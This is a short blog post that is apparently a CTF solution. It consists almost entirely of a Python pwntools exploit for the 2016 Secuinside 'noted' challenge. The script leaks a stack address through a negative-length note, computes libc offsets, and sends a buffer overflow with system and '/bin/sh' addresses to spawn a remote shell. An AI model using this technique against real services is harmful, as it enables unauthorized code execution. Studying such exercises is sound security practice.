2016 secuinside noted
by St1tch from pwn import * import stitch local = False if local : s = remote('localhost', 9999) offset = {'read35' : 0xd5c23, 'system' : 0x3ad80, 'binsh' : 0x15ba3f} raw_input('ready!') else : s = remote('chal.cykor.kr', 20003) offset = {'read35' : 0xd4443, 'system' : 0x3a920, 'binsh' : 0x15909f} def reg_login(menu, myid, mypw) : global s s.recvuntil('\n\n') s.sendline(menu) s.recvuntil(' : ') s.sendline(myid) s.recvuntil(' : ') s.sendline(mypw) def n_write(title, d_len, pw) : global s s.recvuntil('\n\n') s.sendline('2') s.recvuntil(' : ') s.sendline(title) s.recvuntil(' : ') s.sendline(d_len) s.recvuntil(' : ') s.sendline(pw) log.info('Write note! %s'%title) def n_edit(title, title_pw, payload) : global s s.recvuntil('\n\n') s.sendline('4') s.recvuntil(' : ') s.sendline(title) s.recvuntil(' : ') s.sendline(title_pw) stack = s.recvuntil('size) : ') s.sendline(payload) log.info('Edit note! %s'%title) if payload : log.info('Exploit!') s.interactive() return stack if __name__ == '__main__' : myid = mypw = 'stitch' title = title_pw = 'ukuk' reg_login('2', myid, mypw) #register reg_login('1', myid, mypw) #login log.info('login %s'%myid) n_write(title, '-1', title_pw) #lick stack = n_edit(title, title_pw, '') #stitch.dump_str(stack) ebp = stack.find('uk') + 136 read35 = u32(stack[ebp-4:ebp]) d_offset = read35 - offset['read35'] system = d_offset + offset['system'] binsh = d_offset + offset['binsh'] #send payload and exploit pay = 'a' * 1164 pay += p32(system) pay += 'a' * 4 pay += p32(binsh) n_edit(title, title_pw, pay)
블로그의 정보
튜기's blogg(st1tch)
St1tch
